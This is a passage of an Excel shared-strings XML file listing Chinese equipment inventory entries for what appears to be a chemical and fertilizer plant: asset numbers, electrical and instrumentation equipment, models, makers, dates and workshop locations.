    <t>鼓风电机变频器</t>
  </si>
  <si>
    <t>TD-2000</t>
  </si>
  <si>
    <t>日本富士</t>
  </si>
  <si>
    <t>00272</t>
  </si>
  <si>
    <t>低压配电盘</t>
  </si>
  <si>
    <t>00830</t>
  </si>
  <si>
    <t>GGD-4</t>
  </si>
  <si>
    <t>新变压吸附</t>
  </si>
  <si>
    <t>00831</t>
  </si>
  <si>
    <t>GGD-3</t>
  </si>
  <si>
    <t>00832</t>
  </si>
  <si>
    <t>GGD-2</t>
  </si>
  <si>
    <t>00833</t>
  </si>
  <si>
    <t>GGD-1</t>
  </si>
  <si>
    <t>00930</t>
  </si>
  <si>
    <t>PGL-4</t>
  </si>
  <si>
    <t>00933</t>
  </si>
  <si>
    <t>PGL-5</t>
  </si>
  <si>
    <t>00934</t>
  </si>
  <si>
    <t>PGL-3</t>
  </si>
  <si>
    <t>00935</t>
  </si>
  <si>
    <t>PGL2-2</t>
  </si>
  <si>
    <t>00936</t>
  </si>
  <si>
    <t>PGL2-1</t>
  </si>
  <si>
    <t>01248</t>
  </si>
  <si>
    <t>新尿素</t>
  </si>
  <si>
    <t>01219</t>
  </si>
  <si>
    <t>S9-2500/10/0.4KV</t>
  </si>
  <si>
    <t>南变压吸附</t>
  </si>
  <si>
    <t>01220</t>
  </si>
  <si>
    <t>00828</t>
  </si>
  <si>
    <t>GGD-6</t>
  </si>
  <si>
    <t>一网络</t>
  </si>
  <si>
    <t>00829</t>
  </si>
  <si>
    <t>GGD-5</t>
  </si>
  <si>
    <t>01298</t>
  </si>
  <si>
    <t>15KW</t>
  </si>
  <si>
    <t>造气</t>
  </si>
  <si>
    <t>00199</t>
  </si>
  <si>
    <t>造气变配电室</t>
  </si>
  <si>
    <t>01561</t>
  </si>
  <si>
    <t>315kw</t>
  </si>
  <si>
    <t>2010.03.25</t>
  </si>
  <si>
    <t>造气南楼</t>
  </si>
  <si>
    <t>00255</t>
  </si>
  <si>
    <t>减压启动柜</t>
  </si>
  <si>
    <t>造气配电室</t>
  </si>
  <si>
    <t>00193</t>
  </si>
  <si>
    <t>照明箱</t>
  </si>
  <si>
    <t>00209</t>
  </si>
  <si>
    <t>边屏</t>
  </si>
  <si>
    <t>00230</t>
  </si>
  <si>
    <t>配电箱</t>
  </si>
  <si>
    <t>00232</t>
  </si>
  <si>
    <t>照明电源箱</t>
  </si>
  <si>
    <t>00234</t>
  </si>
  <si>
    <t>65吨</t>
  </si>
  <si>
    <t>00237</t>
  </si>
  <si>
    <t>00239</t>
  </si>
  <si>
    <t>00247</t>
  </si>
  <si>
    <t>pxt</t>
  </si>
  <si>
    <t>00263</t>
  </si>
  <si>
    <t>00612</t>
  </si>
  <si>
    <t>PGL-1003</t>
  </si>
  <si>
    <t>01446</t>
  </si>
  <si>
    <t>10KV电站外线及配电室设备安装</t>
  </si>
  <si>
    <t>2008.07.22</t>
  </si>
  <si>
    <t>老尿素</t>
  </si>
  <si>
    <t>XT011/X3011</t>
  </si>
  <si>
    <t>天津</t>
  </si>
  <si>
    <t>1993、1988、1999</t>
  </si>
  <si>
    <t>循环水</t>
  </si>
  <si>
    <t>3000W</t>
  </si>
  <si>
    <t>电机（高压）</t>
  </si>
  <si>
    <t>PRN160GIIS-4CX</t>
  </si>
  <si>
    <t>励磁柜（整流器）</t>
  </si>
  <si>
    <t>250/80</t>
  </si>
  <si>
    <t>PGL-2-166-67</t>
  </si>
  <si>
    <t>溶剂脱碳</t>
  </si>
  <si>
    <t>三项异步电机</t>
  </si>
  <si>
    <t>六安</t>
  </si>
  <si>
    <t>东经化</t>
  </si>
  <si>
    <t>2/GGD  3/KYN28-12</t>
  </si>
  <si>
    <t>65T锅炉</t>
  </si>
  <si>
    <t>水阻柜</t>
  </si>
  <si>
    <t>溴化锂二楼</t>
  </si>
  <si>
    <t>PGL/PGE</t>
  </si>
  <si>
    <t>华冲/北京/华冲</t>
  </si>
  <si>
    <t>2011/2  2000/1  2005/1</t>
  </si>
  <si>
    <t>脱盐水二楼</t>
  </si>
  <si>
    <t>保定天茂</t>
  </si>
  <si>
    <t>新化工循环水</t>
  </si>
  <si>
    <t>180软起（水阻柜）</t>
  </si>
  <si>
    <t>北站2、3号</t>
  </si>
  <si>
    <t>星点柜（短封柜）</t>
  </si>
  <si>
    <t>励磁柜</t>
  </si>
  <si>
    <t>180软起</t>
  </si>
  <si>
    <t>北站1号</t>
  </si>
  <si>
    <t>94机（高压开关柜）</t>
  </si>
  <si>
    <t>湖北追日</t>
  </si>
  <si>
    <t>S9-1000/6.3/400</t>
  </si>
  <si>
    <t>污水</t>
  </si>
  <si>
    <t>XJ011/XJDI-115</t>
  </si>
  <si>
    <t>1981/2  2006/1</t>
  </si>
  <si>
    <t>6.5T</t>
  </si>
  <si>
    <t>GG-H</t>
  </si>
  <si>
    <t>华冲、冀州、大连</t>
  </si>
  <si>
    <t>1989/1982/2001/1982/2005</t>
  </si>
  <si>
    <t>6KV高压</t>
  </si>
  <si>
    <t>XGN-7</t>
  </si>
  <si>
    <t>华冲、大连</t>
  </si>
  <si>
    <t>2004/2007</t>
  </si>
  <si>
    <t>GBG-35-07</t>
  </si>
  <si>
    <t>黑龙江</t>
  </si>
  <si>
    <t>35KV高压</t>
  </si>
  <si>
    <t>00177</t>
  </si>
  <si>
    <t>流量计</t>
  </si>
  <si>
    <t>LDGB</t>
  </si>
  <si>
    <t>00105</t>
  </si>
  <si>
    <t>光柱显示仪</t>
  </si>
  <si>
    <t>XMD1000</t>
  </si>
  <si>
    <t>NHD脱碳</t>
  </si>
  <si>
    <t>00106</t>
  </si>
  <si>
    <t>液位传感器</t>
  </si>
  <si>
    <t>UYB-G</t>
  </si>
  <si>
    <t>00148</t>
  </si>
  <si>
    <t>液位变送器</t>
  </si>
  <si>
    <t>0-6.2KPa</t>
  </si>
  <si>
    <t>00149</t>
  </si>
  <si>
    <t>0-60KPa</t>
  </si>
  <si>
    <t>00150</t>
  </si>
  <si>
    <t>0-1250MM</t>
  </si>
  <si>
    <t>00151</t>
  </si>
  <si>
    <t>涡流流量计</t>
  </si>
  <si>
    <t>DN200</t>
  </si>
  <si>
    <t>00154</t>
  </si>
  <si>
    <t>涡街流量计</t>
  </si>
  <si>
    <t>dn50-150</t>
  </si>
  <si>
    <t>00155</t>
  </si>
  <si>
    <t>红外线气体分析仪</t>
  </si>
  <si>
    <t>qcs-08</t>
  </si>
  <si>
    <t>00157</t>
  </si>
  <si>
    <t>套筒法</t>
  </si>
  <si>
    <t>20-140kpa</t>
  </si>
  <si>
    <t>00158</t>
  </si>
  <si>
    <t>双座调节阀</t>
  </si>
  <si>
    <t>tv-80003</t>
  </si>
  <si>
    <t>00159</t>
  </si>
  <si>
    <t>套筒阀</t>
  </si>
  <si>
    <t>fv8010</t>
  </si>
  <si>
    <t>00160</t>
  </si>
  <si>
    <t>套筒调节阀</t>
  </si>
  <si>
    <t>lv8011</t>
  </si>
  <si>
    <t>00161</t>
  </si>
  <si>
    <t>单座调节阀</t>
  </si>
  <si>
    <t>lv-8012</t>
  </si>
  <si>
    <t>00162</t>
  </si>
  <si>
    <t>lv8001</t>
  </si>
  <si>
    <t>00163</t>
  </si>
  <si>
    <t>fv-8006</t>
  </si>
  <si>
    <t>00164</t>
  </si>
  <si>
    <t>安全栅</t>
  </si>
  <si>
    <t>lb9305</t>
  </si>
  <si>
    <t>00165</t>
  </si>
  <si>
    <t>柜式仪表盘</t>
  </si>
  <si>
    <t>kg-222</t>
  </si>
  <si>
    <t>00166</t>
  </si>
  <si>
    <t>工业控制机</t>
  </si>
  <si>
    <t>dcs2001</t>
  </si>
  <si>
    <t>00681</t>
  </si>
  <si>
    <t>巡检仪</t>
  </si>
  <si>
    <t>01405</t>
  </si>
  <si>
    <t>和利时集成化系统平台</t>
  </si>
  <si>
    <t>MACSV</t>
  </si>
  <si>
    <t>2008.06.26</t>
  </si>
  <si>
    <t>φ1600合成</t>
  </si>
  <si>
    <t>1.6合成其中包括：</t>
  </si>
  <si>
    <t>DCS控制系统</t>
  </si>
  <si>
    <t>MACS V</t>
  </si>
  <si>
    <t>合利时</t>
  </si>
  <si>
    <t>隔爆型多对同径铠装热电偶</t>
  </si>
  <si>
    <t>WRKKTI-341</t>
  </si>
  <si>
    <t>上海通伟</t>
  </si>
  <si>
    <t>压力变送器</t>
  </si>
  <si>
    <t>北京远东</t>
  </si>
  <si>
    <t>调节阀</t>
  </si>
  <si>
    <t>浙江金峰</t>
  </si>
  <si>
    <t>差压变送器</t>
  </si>
  <si>
    <t>BLU-2420  NLU-220B</t>
  </si>
  <si>
    <t>南海</t>
  </si>
  <si>
    <t>智能变送器</t>
  </si>
  <si>
    <t>YW-2000</t>
  </si>
  <si>
    <t>新乡禹王</t>
  </si>
  <si>
    <t>智能控制仪</t>
  </si>
  <si>
    <t>00109</t>
  </si>
  <si>
    <t>大型长图记录仪</t>
  </si>
  <si>
    <t>XWC-300</t>
  </si>
  <si>
    <t>φ3400变换</t>
  </si>
  <si>
    <t>00139</t>
  </si>
  <si>
    <t>热导式分析仪</t>
  </si>
  <si>
    <t>RD-001</t>
  </si>
  <si>
    <t>00141</t>
  </si>
  <si>
    <t>变送器</t>
  </si>
  <si>
    <t>1751DP</t>
  </si>
  <si>
    <t>00662</t>
  </si>
  <si>
    <t>电动浮筒</t>
  </si>
  <si>
    <t>DBF6</t>
  </si>
  <si>
    <t>00670</t>
  </si>
  <si>
    <t>气动阀</t>
  </si>
  <si>
    <t>ZMBK-220K</t>
  </si>
  <si>
    <t>00679</t>
  </si>
  <si>
    <t>显示仪</t>
  </si>
  <si>
    <t>XSZH-9351B-M22</t>
  </si>
  <si>
    <t>00680</t>
  </si>
  <si>
    <t>XSD12</t>
  </si>
  <si>
    <t>00114</t>
  </si>
  <si>
    <t>大型自动记录仪</t>
  </si>
  <si>
    <t>φ800甲醇</t>
  </si>
  <si>
    <t>00120</t>
  </si>
  <si>
    <t>变送器(液位计)</t>
  </si>
  <si>
    <t>00121</t>
  </si>
  <si>
    <t>00660</t>
  </si>
  <si>
    <t>XSZH-935</t>
  </si>
  <si>
    <t>00070</t>
  </si>
  <si>
    <t>框架式仪表盘</t>
  </si>
  <si>
    <t>kkd-33</t>
  </si>
  <si>
    <t>北楼</t>
  </si>
  <si>
    <t>00078</t>
  </si>
  <si>
    <t>右侧门</t>
  </si>
  <si>
    <t>km2100*900</t>
  </si>
  <si>
    <t>00890</t>
  </si>
  <si>
    <t>记录仪</t>
  </si>
  <si>
    <t>LVPR300&lt;16000016A</t>
  </si>
  <si>
    <t>00678</t>
  </si>
  <si>
    <t>气体分析仪</t>
  </si>
  <si>
    <t>QGB-08</t>
  </si>
  <si>
    <t>变换</t>
  </si>
  <si>
    <t>数字巡检仪</t>
  </si>
  <si>
    <t>报警器</t>
  </si>
  <si>
    <t>仪表盘</t>
  </si>
  <si>
    <t>DCS系统</t>
  </si>
  <si>
    <t>00110</t>
  </si>
  <si>
    <t>温度显示仪</t>
  </si>
  <si>
    <t>XSZ-102</t>
  </si>
  <si>
    <t>00111</t>
  </si>
  <si>
    <t>数字显示仪</t>
  </si>
  <si>
    <t>00112</t>
  </si>
  <si>
    <t>数字温度巡检仪</t>
  </si>
  <si>
    <t>XMZ-12</t>
  </si>
  <si>
    <t>00113</t>
  </si>
  <si>
    <t>保温箱</t>
  </si>
  <si>
    <t>YWX-856</t>
  </si>
  <si>
    <t>00140</t>
  </si>
  <si>
    <t>电源箱</t>
  </si>
  <si>
    <t>PFY-3110</t>
  </si>
  <si>
    <t>00145</t>
  </si>
  <si>
    <t>XMD-10</t>
  </si>
  <si>
    <t>00152</t>
  </si>
  <si>
    <t>涡流流量计仪表</t>
  </si>
  <si>
    <t>DN300</t>
  </si>
  <si>
    <t>00153</t>
  </si>
  <si>
    <t>dn25-80</t>
  </si>
  <si>
    <t>00167</t>
  </si>
  <si>
    <t>1751gp5e</t>
  </si>
  <si>
    <t>00168</t>
  </si>
  <si>
    <t>4-20madc</t>
  </si>
  <si>
    <t>00171</t>
  </si>
  <si>
    <t>kg-231</t>
  </si>
  <si>
    <t>00172</t>
  </si>
  <si>
    <t>ddx-3001</t>
  </si>
  <si>
    <t>00173</t>
  </si>
  <si>
    <t>涡流量计</t>
  </si>
  <si>
    <t>lugb</t>
  </si>
  <si>
    <t>00079</t>
  </si>
  <si>
    <t>直流电阻电桥</t>
  </si>
  <si>
    <t>qj-23</t>
  </si>
  <si>
    <t>00080</t>
  </si>
  <si>
    <t>活塞式压力计</t>
  </si>
  <si>
    <t>ys-60</t>
  </si>
  <si>
    <t>00117</t>
  </si>
  <si>
    <t>氧化锆分析仪</t>
  </si>
  <si>
    <t>00118</t>
  </si>
  <si>
    <t>00119</t>
  </si>
  <si>
    <t>XMZ=106</t>
  </si>
  <si>
    <t>00147</t>
  </si>
  <si>
    <t>平衡记录仪</t>
  </si>
  <si>
    <t>0-350C</t>
  </si>
  <si>
    <t>东烃化</t>
  </si>
  <si>
    <t>00682</t>
  </si>
  <si>
    <t>ZMAN-16B</t>
  </si>
  <si>
    <t>00661</t>
  </si>
  <si>
    <t>EKC211A</t>
  </si>
  <si>
    <t>化工车间</t>
  </si>
  <si>
    <t>00663</t>
  </si>
  <si>
    <t>ZMAP-160G65</t>
  </si>
  <si>
    <t>00664</t>
  </si>
  <si>
    <t>电器定位器</t>
  </si>
  <si>
    <t>710I</t>
  </si>
  <si>
    <t>无纸记录仪</t>
  </si>
  <si>
    <t>块</t>
  </si>
  <si>
    <t>报警仪</t>
  </si>
  <si>
    <t>液位计</t>
  </si>
  <si>
    <t>00668</t>
  </si>
  <si>
    <t>LVPR300</t>
  </si>
  <si>
    <t>φ3800变换</t>
  </si>
  <si>
    <t>00918</t>
  </si>
  <si>
    <t>3800变换仪表</t>
  </si>
  <si>
    <t>其中包括：</t>
  </si>
  <si>
    <t>LVPR-300</t>
  </si>
  <si>
    <t>蓝得</t>
  </si>
  <si>
    <t>上海自动化</t>
  </si>
  <si>
    <t>上海七厂</t>
  </si>
  <si>
    <t>浮筒液位计</t>
  </si>
  <si>
    <t>上海五厂</t>
  </si>
  <si>
    <t>流量显示仪</t>
  </si>
  <si>
    <t>XML5606</t>
  </si>
  <si>
    <t>南海新天</t>
  </si>
  <si>
    <t>上海星空</t>
  </si>
  <si>
    <t>北京北分</t>
  </si>
  <si>
    <t>RD-1400</t>
  </si>
  <si>
    <t>南京分析仪表厂</t>
  </si>
  <si>
    <t>数显表</t>
  </si>
  <si>
    <t>LDDB</t>
  </si>
  <si>
    <t>01058</t>
  </si>
  <si>
    <t>1.2'合成仪表</t>
  </si>
  <si>
    <t>φ1.2</t>
  </si>
  <si>
    <t>2006.07.25</t>
  </si>
  <si>
    <t>上海自仪</t>
  </si>
  <si>
    <t>1.2合成仪表</t>
  </si>
  <si>
    <t>电溶式变送器</t>
  </si>
  <si>
    <t>山海</t>
  </si>
  <si>
    <t>01122</t>
  </si>
  <si>
    <t>甲醇车间DCS控制系统</t>
  </si>
  <si>
    <t>甲醇车间</t>
  </si>
  <si>
    <t>北京</t>
  </si>
  <si>
    <t>双组份红外分析仪</t>
  </si>
  <si>
    <t>00146</t>
  </si>
  <si>
    <t>00889</t>
  </si>
  <si>
    <t>液位测控仪</t>
  </si>
  <si>
    <t>YW-2000GL-715MM</t>
  </si>
  <si>
    <t>温度显示表</t>
  </si>
  <si>
    <t>LED-3000</t>
  </si>
  <si>
    <t>双阻份分析仪</t>
  </si>
  <si>
    <t>上海化工研究院仪表厂</t>
  </si>
  <si>
    <t>00137</t>
  </si>
  <si>
    <t>XMD-12</t>
  </si>
  <si>
    <t>精馏</t>
  </si>
  <si>
    <t>00138</t>
  </si>
  <si>
    <t>数字指示仪</t>
  </si>
  <si>
    <t>XMZ-102</t>
  </si>
  <si>
    <t>00665</t>
  </si>
  <si>
    <t>转子流量计</t>
  </si>
  <si>
    <t>DN80</t>
  </si>
  <si>
    <t>00666</t>
  </si>
  <si>
    <t>00667</t>
  </si>
  <si>
    <t>DN50</t>
  </si>
  <si>
    <t>00669</t>
  </si>
  <si>
    <t>XXS-01</t>
  </si>
  <si>
    <t>00675</t>
  </si>
  <si>
    <t>KKD</t>
  </si>
  <si>
    <t>00897</t>
  </si>
  <si>
    <t>DN25</t>
  </si>
  <si>
    <t>00898</t>
  </si>
  <si>
    <t>00899</t>
  </si>
  <si>
    <t>ZVPR300D</t>
  </si>
  <si>
    <t>00108</t>
  </si>
  <si>
    <t>阀门定位器</t>
  </si>
  <si>
    <t>EPA-731</t>
  </si>
  <si>
    <t>旧尿素</t>
  </si>
  <si>
    <t>00115</t>
  </si>
  <si>
    <t>LUGB</t>
  </si>
  <si>
    <t>00116</t>
  </si>
  <si>
    <t>KKD-33</t>
  </si>
  <si>
    <t>00142</t>
  </si>
  <si>
    <t>指示器</t>
  </si>
  <si>
    <t>EKR210A</t>
  </si>
  <si>
    <t>00143</t>
  </si>
  <si>
    <t>调节器</t>
  </si>
  <si>
    <t>调节阀(定位器)</t>
  </si>
  <si>
    <t>00067</t>
  </si>
  <si>
    <t>yxw-865</t>
  </si>
  <si>
    <t>南数/气柜</t>
  </si>
  <si>
    <t>00077</t>
  </si>
  <si>
    <t>左侧门</t>
  </si>
  <si>
    <t>00671</t>
  </si>
  <si>
    <t>定位器</t>
  </si>
  <si>
    <t>701</t>
  </si>
  <si>
    <t>00082</t>
  </si>
  <si>
    <t>温度变送器</t>
  </si>
  <si>
    <t>DWB-3230</t>
  </si>
  <si>
    <t>00083</t>
  </si>
  <si>
    <t>电器阀门定位器</t>
  </si>
  <si>
    <t>zpd-01</t>
  </si>
  <si>
    <t>00084</t>
  </si>
  <si>
    <t>dtl-3110</t>
  </si>
  <si>
    <t>00085</t>
  </si>
  <si>
    <t>电流指示表</t>
  </si>
  <si>
    <t>dce-3100</t>
  </si>
  <si>
    <t>00087</t>
  </si>
  <si>
    <t>er101</t>
  </si>
  <si>
    <t>00088</t>
  </si>
  <si>
    <t>xsz-10</t>
  </si>
  <si>
    <t>00089</t>
  </si>
  <si>
    <t>分电盘</t>
  </si>
  <si>
    <t>dfp-3005</t>
  </si>
  <si>
    <t>00090</t>
  </si>
  <si>
    <t>ddx-10</t>
  </si>
  <si>
    <t>00091</t>
  </si>
  <si>
    <t>单向路闪电报警器</t>
  </si>
  <si>
    <t>程控机(自控机)</t>
  </si>
  <si>
    <t>92-98</t>
  </si>
  <si>
    <t>00092</t>
  </si>
  <si>
    <t>外浮筒(液位计)</t>
  </si>
  <si>
    <t>UTD-01</t>
  </si>
  <si>
    <t>00093</t>
  </si>
  <si>
    <t>h27</t>
  </si>
  <si>
    <t>00094</t>
  </si>
  <si>
    <t>sybc</t>
  </si>
  <si>
    <t>00095</t>
  </si>
  <si>
    <t>电疗变送器</t>
  </si>
  <si>
    <t>sbcc</t>
  </si>
  <si>
    <t>00175</t>
  </si>
  <si>
    <t>1151DP</t>
  </si>
  <si>
    <t>00674</t>
  </si>
  <si>
    <t>00683</t>
  </si>
  <si>
    <t>L1000MM</t>
  </si>
  <si>
    <t>00887</t>
  </si>
  <si>
    <t>115/DP-1199DA</t>
  </si>
  <si>
    <t>00081</t>
  </si>
  <si>
    <t>仪表保温箱</t>
  </si>
  <si>
    <t>ywx-856</t>
  </si>
  <si>
    <t>尿素/脱碳</t>
  </si>
  <si>
    <t>00144</t>
  </si>
  <si>
    <t>表盘</t>
  </si>
  <si>
    <t>尿素循环水</t>
  </si>
  <si>
    <t>01123</t>
  </si>
  <si>
    <t>三废炉仪表(含DCS)</t>
  </si>
  <si>
    <t>2006.12.15</t>
  </si>
  <si>
    <t>三废锅炉</t>
  </si>
  <si>
    <t>其中包含：</t>
  </si>
  <si>
    <t>JX-300XP</t>
  </si>
  <si>
    <t>电溶式液位计</t>
  </si>
  <si>
    <t>00156</t>
  </si>
  <si>
    <t>fe8020</t>
  </si>
  <si>
    <t>深度水解</t>
  </si>
  <si>
    <t>00684</t>
  </si>
  <si>
    <t>气动薄膜阀</t>
  </si>
  <si>
    <t>ZMZA-16BDG150</t>
  </si>
  <si>
    <t>00894</t>
  </si>
  <si>
    <t>气动调节阀</t>
  </si>
  <si>
    <t>ZMAN-64BD80</t>
  </si>
  <si>
    <t>00896</t>
  </si>
  <si>
    <t>2100*900*600</t>
  </si>
  <si>
    <t>01515</t>
  </si>
  <si>
    <t>PH在线分析仪</t>
  </si>
  <si>
    <t>YRCN111 0-14PH</t>
  </si>
  <si>
    <t>2009.07.26</t>
  </si>
  <si>
    <t>水汽50吨</t>
  </si>
  <si>
    <t>01516</t>
  </si>
  <si>
    <t>电子电动调节阀</t>
  </si>
  <si>
    <t>ZAZN-50 4-20MA</t>
  </si>
  <si>
    <t>01718</t>
  </si>
  <si>
    <t>DCS自控系统</t>
  </si>
  <si>
    <t>西厂区65T三废锅炉岗位</t>
  </si>
  <si>
    <t>00909</t>
  </si>
  <si>
    <t>东造气楼仪表</t>
  </si>
  <si>
    <t>智能巡检报警仪</t>
  </si>
  <si>
    <t>安徽</t>
  </si>
  <si>
    <t>浙江</t>
  </si>
  <si>
    <t>01240</t>
  </si>
  <si>
    <t>造汽东南楼仪表</t>
  </si>
  <si>
    <t>造气炉控制系统</t>
  </si>
  <si>
    <t>水汽东南楼</t>
  </si>
  <si>
    <t>01467</t>
  </si>
  <si>
    <t>自动探焦器及仪表柜</t>
  </si>
  <si>
    <t>CJ/TJQ06</t>
  </si>
  <si>
    <t>2008.10.17</t>
  </si>
  <si>
    <t>00178</t>
  </si>
  <si>
    <t>数字交换机</t>
  </si>
  <si>
    <t>JSQ-31</t>
  </si>
  <si>
    <t>调度室</t>
  </si>
  <si>
    <t>00630</t>
  </si>
  <si>
    <t>开关电源</t>
  </si>
  <si>
    <t>gt4820</t>
  </si>
  <si>
    <t>01186</t>
  </si>
  <si>
    <t>DAS监测调度系统</t>
  </si>
  <si>
    <t>IS800</t>
  </si>
  <si>
    <t>00672</t>
  </si>
  <si>
    <t>00676</t>
  </si>
  <si>
    <t>控氧仪</t>
  </si>
  <si>
    <t>00066</t>
  </si>
  <si>
    <t>数字式温度显示仪</t>
  </si>
  <si>
    <t>xsz-102</t>
  </si>
  <si>
    <t>00069</t>
  </si>
  <si>
    <t>闪光信号报警器</t>
  </si>
  <si>
    <t>HR-WP-X80</t>
  </si>
  <si>
    <t>00677</t>
  </si>
  <si>
    <t>00176</t>
  </si>
  <si>
    <t>涡街流量传感器</t>
  </si>
  <si>
    <t>小冰机</t>
  </si>
  <si>
    <t>西21T</t>
  </si>
  <si>
    <t>00673</t>
  </si>
  <si>
    <t>补偿仪</t>
  </si>
  <si>
    <t>LXB-11</t>
  </si>
  <si>
    <t>型煤</t>
  </si>
  <si>
    <t>00068</t>
  </si>
  <si>
    <t>00071</t>
  </si>
  <si>
    <t>00074</t>
  </si>
  <si>
    <t>电动阀门定位器</t>
  </si>
  <si>
    <t>00174</t>
  </si>
  <si>
    <t>涡流街量计</t>
  </si>
  <si>
    <t>00888</t>
  </si>
  <si>
    <t>YW-2000GL-440M</t>
  </si>
  <si>
    <t>00891</t>
  </si>
  <si>
    <t>LUGB-2405</t>
  </si>
  <si>
    <t>00892</t>
  </si>
  <si>
    <t>LUGB-2410</t>
  </si>
  <si>
    <t>00893</t>
  </si>
  <si>
    <t>LUGB-2408</t>
  </si>
  <si>
    <t>2005.07.21</t>
  </si>
  <si>
    <t>01532</t>
  </si>
  <si>
    <t>气动薄膜套筒调节阀</t>
  </si>
  <si>
    <t>ZJHM-64K DN200</t>
  </si>
  <si>
    <t>00758</t>
  </si>
  <si>
    <t>蒸汽压力调节阀</t>
  </si>
  <si>
    <t>KV360DN200</t>
  </si>
  <si>
    <t>2004.09.30</t>
  </si>
  <si>
    <t>造气南北楼</t>
  </si>
  <si>
    <t>00064</t>
  </si>
  <si>
    <t>电话机</t>
  </si>
  <si>
    <t>hb-680</t>
  </si>
  <si>
    <t>00065</t>
  </si>
  <si>
    <t>zmhn-16</t>
  </si>
  <si>
    <t>00072</t>
  </si>
  <si>
    <t>自动平衡记录仪</t>
  </si>
  <si>
    <t>xwd-100-10</t>
  </si>
  <si>
    <t>00073</t>
  </si>
  <si>
    <t>气动薄膜调节阀</t>
  </si>
  <si>
    <t>zmap-16 dg32</t>
  </si>
  <si>
    <t>00075</t>
  </si>
  <si>
    <t>电动调节器（遥控）</t>
  </si>
  <si>
    <t>dtl-321</t>
  </si>
  <si>
    <t>00076</t>
  </si>
  <si>
    <t>热导式氨分分析</t>
  </si>
  <si>
    <t>hqg-71a</t>
  </si>
  <si>
    <t>00086</t>
  </si>
  <si>
    <t>液味显示控制器</t>
  </si>
  <si>
    <t>lqk-86</t>
  </si>
  <si>
    <t>00096</t>
  </si>
  <si>
    <t>微量分析记录仪</t>
  </si>
  <si>
    <t>xmq-300</t>
  </si>
  <si>
    <t>00107</t>
  </si>
  <si>
    <t>废锅上水自调</t>
  </si>
  <si>
    <t>DTL-231</t>
  </si>
  <si>
    <t>00122</t>
  </si>
  <si>
    <t>00169</t>
  </si>
  <si>
    <t>dby-3240b</t>
  </si>
  <si>
    <t>00170</t>
  </si>
  <si>
    <t>dbc-3210</t>
  </si>
  <si>
    <t>00757</t>
  </si>
  <si>
    <t>数字报警仪</t>
  </si>
  <si>
    <t>00895</t>
  </si>
  <si>
    <t>SP310 2H-901</t>
  </si>
  <si>
    <t>低压氢回收岗位</t>
  </si>
  <si>
    <t>西烃化</t>
  </si>
  <si>
    <t>光格显示仪</t>
  </si>
  <si>
    <t>电容变送器</t>
  </si>
  <si>
    <t>4.4变换</t>
  </si>
  <si>
    <t>2米8变换</t>
  </si>
  <si>
    <t>四川</t>
  </si>
  <si>
    <t>金属转子流量计</t>
  </si>
  <si>
    <t>承德</t>
  </si>
  <si>
    <t>智能涡轮流量计</t>
  </si>
  <si>
    <t>合肥</t>
  </si>
  <si>
    <t>椭圆齿轮流量计</t>
  </si>
  <si>
    <t>账面价值</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>使用部门</t>
  </si>
  <si>
    <t>原值</t>
  </si>
  <si>
    <t>成新率％</t>
  </si>
  <si>
    <t>01766</t>
  </si>
  <si>
    <t>S9-400/6</t>
  </si>
  <si>
    <t>氰尿酸车间</t>
  </si>
  <si>
    <t>01767</t>
  </si>
  <si>
    <t>开关柜及变压器</t>
  </si>
  <si>
    <t>S9-500/6</t>
  </si>
  <si>
    <t>河北冀州</t>
  </si>
  <si>
    <t>2007.12.01</t>
  </si>
  <si>
    <t>低柜10面（1999）</t>
  </si>
  <si>
    <t>01771</t>
  </si>
  <si>
    <t>窑炉</t>
  </si>
  <si>
    <t>50米</t>
  </si>
  <si>
    <t>2008.03.01</t>
  </si>
  <si>
    <t>01772</t>
  </si>
  <si>
    <t>泵站</t>
  </si>
  <si>
    <t>50米粗品炉</t>
  </si>
  <si>
    <t>01773</t>
  </si>
  <si>
    <t>轨道车</t>
  </si>
  <si>
    <t>含φ125/90-1500液压油缸，含7.5电机、50泵、2联阀</t>
  </si>
  <si>
    <t>01774</t>
  </si>
  <si>
    <t>颚式破碎机</t>
  </si>
  <si>
    <t>双轴1.5kw</t>
  </si>
  <si>
    <t>河南</t>
  </si>
  <si>
    <t>01775</t>
  </si>
  <si>
    <t>引风机</t>
  </si>
  <si>
    <t>PE200×300</t>
  </si>
  <si>
    <t>01776</t>
  </si>
  <si>
    <t>硫酸储罐</t>
  </si>
  <si>
    <t>G6-41№6.4A   （360T  DN)</t>
  </si>
  <si>
    <t>01777</t>
  </si>
  <si>
    <t>母液罐</t>
  </si>
  <si>
    <t>φ2000×5000</t>
  </si>
  <si>
    <t>玻璃钢</t>
  </si>
  <si>
    <t>01778</t>
  </si>
  <si>
    <t>液下泵</t>
  </si>
  <si>
    <t>φ1200×2500</t>
  </si>
  <si>
    <t>01779</t>
  </si>
  <si>
    <t>推料离心机</t>
  </si>
  <si>
    <t>IS65-50-125</t>
  </si>
  <si>
    <t>01780</t>
  </si>
  <si>
    <t>变频控制柜</t>
  </si>
  <si>
    <t>ANDECL  安德利</t>
  </si>
  <si>
    <t>01781</t>
  </si>
  <si>
    <t>烟筒</t>
  </si>
  <si>
    <t>ADL6000P-L750</t>
  </si>
  <si>
    <t>01782</t>
  </si>
  <si>
    <t>直径800*2000</t>
  </si>
  <si>
    <t>01783</t>
  </si>
  <si>
    <t>循环槽</t>
  </si>
  <si>
    <t>HB-ZK耐腐蚀沙浆泵80-40-50</t>
  </si>
  <si>
    <t>01784</t>
  </si>
  <si>
    <t>饱和塔（已改造成储粉塔）</t>
  </si>
  <si>
    <t>φ1800×1200</t>
  </si>
  <si>
    <t>01785</t>
  </si>
  <si>
    <t>稠厚器</t>
  </si>
  <si>
    <t>3600×5000</t>
  </si>
  <si>
    <t>01786</t>
  </si>
  <si>
    <t>喷淋吸收塔</t>
  </si>
  <si>
    <t>316L</t>
  </si>
  <si>
    <t>01787</t>
  </si>
  <si>
    <t>氨引风机</t>
  </si>
  <si>
    <t>带电机</t>
  </si>
  <si>
    <t>变压器室</t>
  </si>
  <si>
    <t>01789</t>
  </si>
  <si>
    <t>大铁罐</t>
  </si>
  <si>
    <t>01790</t>
  </si>
  <si>
    <t>硫酸罐</t>
  </si>
  <si>
    <t>2*5</t>
  </si>
  <si>
    <t>其中一个已坏漏</t>
  </si>
  <si>
    <t>01791</t>
  </si>
  <si>
    <t>01792</t>
  </si>
  <si>
    <t>料浆罐（东）</t>
  </si>
  <si>
    <t>316L   2.5*1.5</t>
  </si>
  <si>
    <t>01793</t>
  </si>
  <si>
    <t>01794</t>
  </si>
  <si>
    <t>循环母液槽</t>
  </si>
  <si>
    <t>40Fr32</t>
  </si>
  <si>
